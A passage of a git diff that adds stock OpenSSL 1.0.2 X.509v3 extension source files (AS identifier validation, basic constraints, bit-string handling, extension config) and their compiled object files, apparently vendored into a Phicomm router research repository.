+        case ASIdentifierChoice_asIdsOrRanges:
+            child_rdi = ext->rdi->u.asIdsOrRanges;
+            break;
+        }
+    }
+
+    /*
+     * Now walk up the chain.  Extensions must be in canonical form, no
+     * cert may list resources that its parent doesn't list.
+     */
+    for (i++; i < sk_X509_num(chain); i++) {
+        x = sk_X509_value(chain, i);
+        OPENSSL_assert(x != NULL);
+        if (x->rfc3779_asid == NULL) {
+            if (child_as != NULL || child_rdi != NULL)
+                validation_err(X509_V_ERR_UNNESTED_RESOURCE);
+            continue;
+        }
+        if (!v3_asid_is_canonical(x->rfc3779_asid))
+            validation_err(X509_V_ERR_INVALID_EXTENSION);
+        if (x->rfc3779_asid->asnum == NULL && child_as != NULL) {
+            validation_err(X509_V_ERR_UNNESTED_RESOURCE);
+            child_as = NULL;
+            inherit_as = 0;
+        }
+        if (x->rfc3779_asid->asnum != NULL &&
+            x->rfc3779_asid->asnum->type ==
+            ASIdentifierChoice_asIdsOrRanges) {
+            if (inherit_as
+                || asid_contains(x->rfc3779_asid->asnum->u.asIdsOrRanges,
+                                 child_as)) {
+                child_as = x->rfc3779_asid->asnum->u.asIdsOrRanges;
+                inherit_as = 0;
+            } else {
+                validation_err(X509_V_ERR_UNNESTED_RESOURCE);
+            }
+        }
+        if (x->rfc3779_asid->rdi == NULL && child_rdi != NULL) {
+            validation_err(X509_V_ERR_UNNESTED_RESOURCE);
+            child_rdi = NULL;
+            inherit_rdi = 0;
+        }
+        if (x->rfc3779_asid->rdi != NULL &&
+            x->rfc3779_asid->rdi->type == ASIdentifierChoice_asIdsOrRanges) {
+            if (inherit_rdi ||
+                asid_contains(x->rfc3779_asid->rdi->u.asIdsOrRanges,
+                              child_rdi)) {
+                child_rdi = x->rfc3779_asid->rdi->u.asIdsOrRanges;
+                inherit_rdi = 0;
+            } else {
+                validation_err(X509_V_ERR_UNNESTED_RESOURCE);
+            }
+        }
+    }
+
+    /*
+     * Trust anchor can't inherit.
+     */
+    OPENSSL_assert(x != NULL);
+    if (x->rfc3779_asid != NULL) {
+        if (x->rfc3779_asid->asnum != NULL &&
+            x->rfc3779_asid->asnum->type == ASIdentifierChoice_inherit)
+            validation_err(X509_V_ERR_UNNESTED_RESOURCE);
+        if (x->rfc3779_asid->rdi != NULL &&
+            x->rfc3779_asid->rdi->type == ASIdentifierChoice_inherit)
+            validation_err(X509_V_ERR_UNNESTED_RESOURCE);
+    }
+
+ done:
+    return ret;
+}
+
+# undef validation_err
+
+/*
+ * RFC 3779 3.3 path validation -- called from X509_verify_cert().
+ */
+int v3_asid_validate_path(X509_STORE_CTX *ctx)
+{
+    return v3_asid_validate_path_internal(ctx, ctx->chain, NULL);
+}
+
+/*
+ * RFC 3779 3.3 path validation of an extension.
+ * Test whether chain covers extension.
+ */
+int v3_asid_validate_resource_set(STACK_OF(X509) *chain,
+                                  ASIdentifiers *ext, int allow_inheritance)
+{
+    if (ext == NULL)
+        return 1;
+    if (chain == NULL || sk_X509_num(chain) == 0)
+        return 0;
+    if (!allow_inheritance && v3_asid_inherits(ext))
+        return 0;
+    return v3_asid_validate_path_internal(NULL, chain, ext);
+}
+
+#endif                          /* OPENSSL_NO_RFC3779 */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_asid.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_asid.o
new file mode 100644
index 0000000000000000000000000000000000000000..43c35c141c9c4b8a044376817248dd8e10ef98c4
GIT binary patch
literal 1080
zcmbVLO-sW-5S=vj`=U3&OFXG)m((hv2MLtgi-?zk;6ai!sFZw=Y>K_;U-0L6>|gR1
z=uEPU%WmqS1CzJ&_PyE3ru`V)-n1+WWLR(wf0bkbz7*1{Xb(1F17O(iUpa@PpiFq_
zT(TZ>JKc-2D!cEeE_2V0YP#;#M%cz&!5rR=pan1|&c^&N==e5#|1@dr#)+vXc5euK
z!D)6im1(eH)g+OzaUvt8y(hnT9kURC6|<Q80V2<9e32_2y>Vb;pZmaqq5u}AaU3Pc
zB`J>>-b|<9emD{Jb5gP_PqQfJGvmaih&^=Co$7DqE$F6v{z|crPvZ3N=2g4qL-!w`
zWF2!^{|S1jr;DkECyHa0#I-zM;<>`9(urCqYw45J02gbR`Y$XK0!N?(dRH~5pYEmo
rPa&EMB%e&8b_I|BJmc<Y>s}1HC3F(>`FC(bzkAX?3gLq^3e^3-k|j9@

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_bcons.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_bcons.c
new file mode 100644
index 0000000..dc00b9c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_bcons.c
@@ -0,0 +1,132 @@
+/* v3_bcons.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+static STACK_OF(CONF_VALUE) *i2v_BASIC_CONSTRAINTS(X509V3_EXT_METHOD *method,
+                                                   BASIC_CONSTRAINTS *bcons,
+                                                   STACK_OF(CONF_VALUE)
+                                                   *extlist);
+static BASIC_CONSTRAINTS *v2i_BASIC_CONSTRAINTS(X509V3_EXT_METHOD *method,
+                                                X509V3_CTX *ctx,
+                                                STACK_OF(CONF_VALUE) *values);
+
+const X509V3_EXT_METHOD v3_bcons = {
+    NID_basic_constraints, 0,
+    ASN1_ITEM_ref(BASIC_CONSTRAINTS),
+    0, 0, 0, 0,
+    0, 0,
+    (X509V3_EXT_I2V) i2v_BASIC_CONSTRAINTS,
+    (X509V3_EXT_V2I)v2i_BASIC_CONSTRAINTS,
+    NULL, NULL,
+    NULL
+};
+
+ASN1_SEQUENCE(BASIC_CONSTRAINTS) = {
+        ASN1_OPT(BASIC_CONSTRAINTS, ca, ASN1_FBOOLEAN),
+        ASN1_OPT(BASIC_CONSTRAINTS, pathlen, ASN1_INTEGER)
+} ASN1_SEQUENCE_END(BASIC_CONSTRAINTS)
+
+IMPLEMENT_ASN1_FUNCTIONS(BASIC_CONSTRAINTS)
+
+static STACK_OF(CONF_VALUE) *i2v_BASIC_CONSTRAINTS(X509V3_EXT_METHOD *method,
+                                                   BASIC_CONSTRAINTS *bcons,
+                                                   STACK_OF(CONF_VALUE)
+                                                   *extlist)
+{
+    X509V3_add_value_bool("CA", bcons->ca, &extlist);
+    X509V3_add_value_int("pathlen", bcons->pathlen, &extlist);
+    return extlist;
+}
+
+static BASIC_CONSTRAINTS *v2i_BASIC_CONSTRAINTS(X509V3_EXT_METHOD *method,
+                                                X509V3_CTX *ctx,
+                                                STACK_OF(CONF_VALUE) *values)
+{
+    BASIC_CONSTRAINTS *bcons = NULL;
+    CONF_VALUE *val;
+    int i;
+    if (!(bcons = BASIC_CONSTRAINTS_new())) {
+        X509V3err(X509V3_F_V2I_BASIC_CONSTRAINTS, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(values); i++) {
+        val = sk_CONF_VALUE_value(values, i);
+        if (!strcmp(val->name, "CA")) {
+            if (!X509V3_get_value_bool(val, &bcons->ca))
+                goto err;
+        } else if (!strcmp(val->name, "pathlen")) {
+            if (!X509V3_get_value_int(val, &bcons->pathlen))
+                goto err;
+        } else {
+            X509V3err(X509V3_F_V2I_BASIC_CONSTRAINTS, X509V3_R_INVALID_NAME);
+            X509V3_conf_err(val);
+            goto err;
+        }
+    }
+    return bcons;
+ err:
+    BASIC_CONSTRAINTS_free(bcons);
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_bcons.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_bcons.o
new file mode 100644
index 0000000000000000000000000000000000000000..047cc3f2f5fbe5031f8ea3c6b7ffe19c00b797a8
GIT binary patch
literal 4968
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
Rdi#gP|Ha-bhvb^-{})6`sH*?~

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_bitst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_bitst.c
new file mode 100644
index 0000000..b7bb3b5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_bitst.c
@@ -0,0 +1,142 @@
+/* v3_bitst.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+static BIT_STRING_BITNAME ns_cert_type_table[] = {
+    {0, "SSL Client", "client"},
+    {1, "SSL Server", "server"},
+    {2, "S/MIME", "email"},
+    {3, "Object Signing", "objsign"},
+    {4, "Unused", "reserved"},
+    {5, "SSL CA", "sslCA"},
+    {6, "S/MIME CA", "emailCA"},
+    {7, "Object Signing CA", "objCA"},
+    {-1, NULL, NULL}
+};
+
+static BIT_STRING_BITNAME key_usage_type_table[] = {
+    {0, "Digital Signature", "digitalSignature"},
+    {1, "Non Repudiation", "nonRepudiation"},
+    {2, "Key Encipherment", "keyEncipherment"},
+    {3, "Data Encipherment", "dataEncipherment"},
+    {4, "Key Agreement", "keyAgreement"},
+    {5, "Certificate Sign", "keyCertSign"},
+    {6, "CRL Sign", "cRLSign"},
+    {7, "Encipher Only", "encipherOnly"},
+    {8, "Decipher Only", "decipherOnly"},
+    {-1, NULL, NULL}
+};
+
+const X509V3_EXT_METHOD v3_nscert =
+EXT_BITSTRING(NID_netscape_cert_type, ns_cert_type_table);
+const X509V3_EXT_METHOD v3_key_usage =
+EXT_BITSTRING(NID_key_usage, key_usage_type_table);
+
+STACK_OF(CONF_VALUE) *i2v_ASN1_BIT_STRING(X509V3_EXT_METHOD *method,
+                                          ASN1_BIT_STRING *bits,
+                                          STACK_OF(CONF_VALUE) *ret)
+{
+    BIT_STRING_BITNAME *bnam;
+    for (bnam = method->usr_data; bnam->lname; bnam++) {
+        if (ASN1_BIT_STRING_get_bit(bits, bnam->bitnum))
+            X509V3_add_value(bnam->lname, NULL, &ret);
+    }
+    return ret;
+}
+
+ASN1_BIT_STRING *v2i_ASN1_BIT_STRING(X509V3_EXT_METHOD *method,
+                                     X509V3_CTX *ctx,
+                                     STACK_OF(CONF_VALUE) *nval)
+{
+    CONF_VALUE *val;
+    ASN1_BIT_STRING *bs;
+    int i;
+    BIT_STRING_BITNAME *bnam;
+    if (!(bs = M_ASN1_BIT_STRING_new())) {
+        X509V3err(X509V3_F_V2I_ASN1_BIT_STRING, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        val = sk_CONF_VALUE_value(nval, i);
+        for (bnam = method->usr_data; bnam->lname; bnam++) {
+            if (!strcmp(bnam->sname, val->name) ||
+                !strcmp(bnam->lname, val->name)) {
+                if (!ASN1_BIT_STRING_set_bit(bs, bnam->bitnum, 1)) {
+                    X509V3err(X509V3_F_V2I_ASN1_BIT_STRING,
+                              ERR_R_MALLOC_FAILURE);
+                    M_ASN1_BIT_STRING_free(bs);
+                    return NULL;
+                }
+                break;
+            }
+        }
+        if (!bnam->lname) {
+            X509V3err(X509V3_F_V2I_ASN1_BIT_STRING,
+                      X509V3_R_UNKNOWN_BIT_STRING_ARGUMENT);
+            X509V3_conf_err(val);
+            M_ASN1_BIT_STRING_free(bs);
+            return NULL;
+        }
+    }
+    return bs;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_bitst.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_bitst.o
new file mode 100644
index 0000000000000000000000000000000000000000..a661ee0a2a517bcb4ab4e043e6e062404cc8b6ef
GIT binary patch
literal 5808
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
E2E#tj>i_@%

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_conf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_conf.c
new file mode 100644
index 0000000..eeff8bd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_conf.c
@@ -0,0 +1,532 @@
+/* v3_conf.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* extension creation utilities */
+
+#include <stdio.h>
+#include <ctype.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+static int v3_check_critical(char **value);
+static int v3_check_generic(char **value);
+static X509_EXTENSION *do_ext_nconf(CONF *conf, X509V3_CTX *ctx, int ext_nid,
